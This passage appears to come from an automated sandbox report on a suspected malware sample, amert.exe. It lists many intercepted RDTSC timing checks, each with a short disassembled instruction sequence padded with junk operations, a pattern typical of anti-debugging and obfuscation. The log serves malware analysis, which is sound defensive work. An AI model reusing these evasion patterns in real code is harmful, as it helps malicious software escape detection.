Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 81794A second address: 817967 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0D755569C4h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 817BD8 second address: 817BDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 817BDC second address: 817C0D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0D755569B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F0D755569C7h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0D755569BEh 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 817C0D second address: 817C11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 817C11 second address: 817C23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F0D755569B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 817C23 second address: 817C29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 817C29 second address: 817C2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 817EA3 second address: 817EAE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push ebx 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8183E0 second address: 8183F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8183F5 second address: 818407 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 je 00007F0D7471B5D6h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 818407 second address: 81843C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0D755569C9h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8185BD second address: 8185CF instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0D7471B5D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007F0D7471B5DEh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 818723 second address: 818769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F0D755569C6h 0x0000000b jmp 00007F0D755569C1h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 jmp 00007F0D755569C6h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 818B26 second address: 818B2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 818B2A second address: 818B5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jnl 00007F0D755569B6h 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 pushad 0x00000011 push edi 0x00000012 pop edi 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F0D755569C2h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f jc 00007F0D755569B6h 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 818B5C second address: 818B60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 818B60 second address: 818B9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F0D755569B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007F0D755569C3h 0x00000013 push ecx 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F0D755569C0h 0x0000001b pop ecx 0x0000001c push eax 0x0000001d je 00007F0D755569B6h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 81945F second address: 819466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 82026E second address: 820273 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 820273 second address: 820287 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0D7471B5DFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8213E1 second address: 821402 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 popad 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d js 00007F0D755569CAh 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F0D755569BCh 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 821402 second address: 82141E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0D7471B5E0h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 82141E second address: 821424 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 825070 second address: 82507A instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0D7471B5DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7EF854 second address: 7EF85A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8247BD second address: 8247C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8247C1 second address: 8247CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 js 00007F0D755569B6h 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8247CF second address: 8247E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 pop eax 0x00000009 popad 0x0000000a ja 00007F0D7471B5DEh 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 824E7E second address: 824E84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 824E84 second address: 824EAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D7471B5DCh 0x00000007 js 00007F0D7471B5D6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnc 00007F0D7471B5D8h 0x00000015 push eax 0x00000016 push edx 0x00000017 jnp 00007F0D7471B5D6h 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 824EAA second address: 824EAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 824EAE second address: 824EBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 824EBD second address: 824EC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 824EC1 second address: 824ECB instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0D7471B5D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 824ECB second address: 824EEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0D755569C9h 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 824EEA second address: 824EEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 824EEF second address: 824F09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D755569C4h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 824F09 second address: 824F1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0D7471B5DDh 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 827C04 second address: 827C1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 js 00007F0D755569D4h 0x0000000e push eax 0x0000000f push edx 0x00000010 jne 00007F0D755569B6h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 827D01 second address: 827D05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 827D05 second address: 827D09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 827D09 second address: 827D0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 828B11 second address: 828B15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 828B15 second address: 828B23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 828B23 second address: 828B27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 828B27 second address: 828B3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D7471B5E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 828D3F second address: 828D46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 828D46 second address: 828D67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F0D7471B5E3h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 828D67 second address: 828D6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 828D6D second address: 828D71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 829537 second address: 82953E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 829EFE second address: 829F02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 829D71 second address: 829D77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 82BAAA second address: 82BAAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 82A78D second address: 82A793 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 82B85A second address: 82B875 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D7471B5E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 82B875 second address: 82B87B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 82C491 second address: 82C49B instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0D7471B5D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 82C49B second address: 82C4CF instructions: 0x00000000 rdtsc 0x00000002 je 00007F0D755569C2h 0x00000008 jmp 00007F0D755569BCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edi 0x00000011 pushad 0x00000012 jmp 00007F0D755569C9h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 82C4CF second address: 82C568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007F0D7471B5D8h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 0000001Bh 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 sbb esi, 3B6CAB57h 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push ebx 0x0000002c call 00007F0D7471B5D8h 0x00000031 pop ebx 0x00000032 mov dword ptr [esp+04h], ebx 0x00000036 add dword ptr [esp+04h], 0000001Bh 0x0000003e inc ebx 0x0000003f push ebx 0x00000040 ret 0x00000041 pop ebx 0x00000042 ret 0x00000043 jno 00007F0D7471B5EAh 0x00000049 push 00000000h 0x0000004b je 00007F0D7471B5DCh 0x00000051 mov edi, dword ptr [ebp+122D39ABh] 0x00000057 jng 00007F0D7471B5DCh 0x0000005d and edi, 260D0A92h 0x00000063 xchg eax, ebx 0x00000064 push eax 0x00000065 push edx 0x00000066 jmp 00007F0D7471B5DDh 0x0000006b rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 82C568 second address: 82C577 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 82CF59 second address: 82CF5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 82D9E3 second address: 82D9EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 82D9EA second address: 82DA08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 pushad 0x0000000a jmp 00007F0D7471B5E2h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 82E222 second address: 82E23E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0D755569C4h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 82E23E second address: 82E248 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F0D7471B5D6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 82EDD7 second address: 82EDDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 82EDDB second address: 82EDFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 ja 00007F0D7471B5F0h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0D7471B5E2h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 830BF9 second address: 830BFE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 83134A second address: 83136F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D7471B5E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F0D7471B5D6h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 83136F second address: 831373 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8358F1 second address: 8358F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8358F8 second address: 83591A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D755569C4h 0x00000009 popad 0x0000000a pushad 0x0000000b jbe 00007F0D755569B6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 836FB4 second address: 836FCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jns 00007F0D7471B5D6h 0x0000000f jne 00007F0D7471B5D6h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 838F8F second address: 838F95 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 838F95 second address: 838F9F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0D7471B5DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8380BC second address: 8380C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8380C0 second address: 8380C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 839F55 second address: 839F59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 8391AF second address: 8391B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 7F135A second address: 7F1368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0D755569B6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 83A159 second address: 83A15D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 83A15D second address: 83A178 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0D755569C3h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 83C561 second address: 83C56B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F0D7471B5D6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 83C6EE second address: 83C71B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F0D755569CAh 0x00000012 jmp 00007F0D755569C4h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 83E631 second address: 83E649 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0D7471B5DEh 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 83E649 second address: 83E64D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 83E64D second address: 83E660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0D7471B5DBh 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 83E7CB second address: 83E7CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 83F6F4 second address: 83F75E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push ebx 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c pop ebx 0x0000000d nop 0x0000000e push dword ptr fs:[00000000h] 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007F0D7471B5D8h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f push esi 0x00000030 add dword ptr [ebp+124492C8h], esi 0x00000036 pop ebx 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e adc edi, 1E84177Bh 0x00000044 mov eax, dword ptr [ebp+122D0745h] 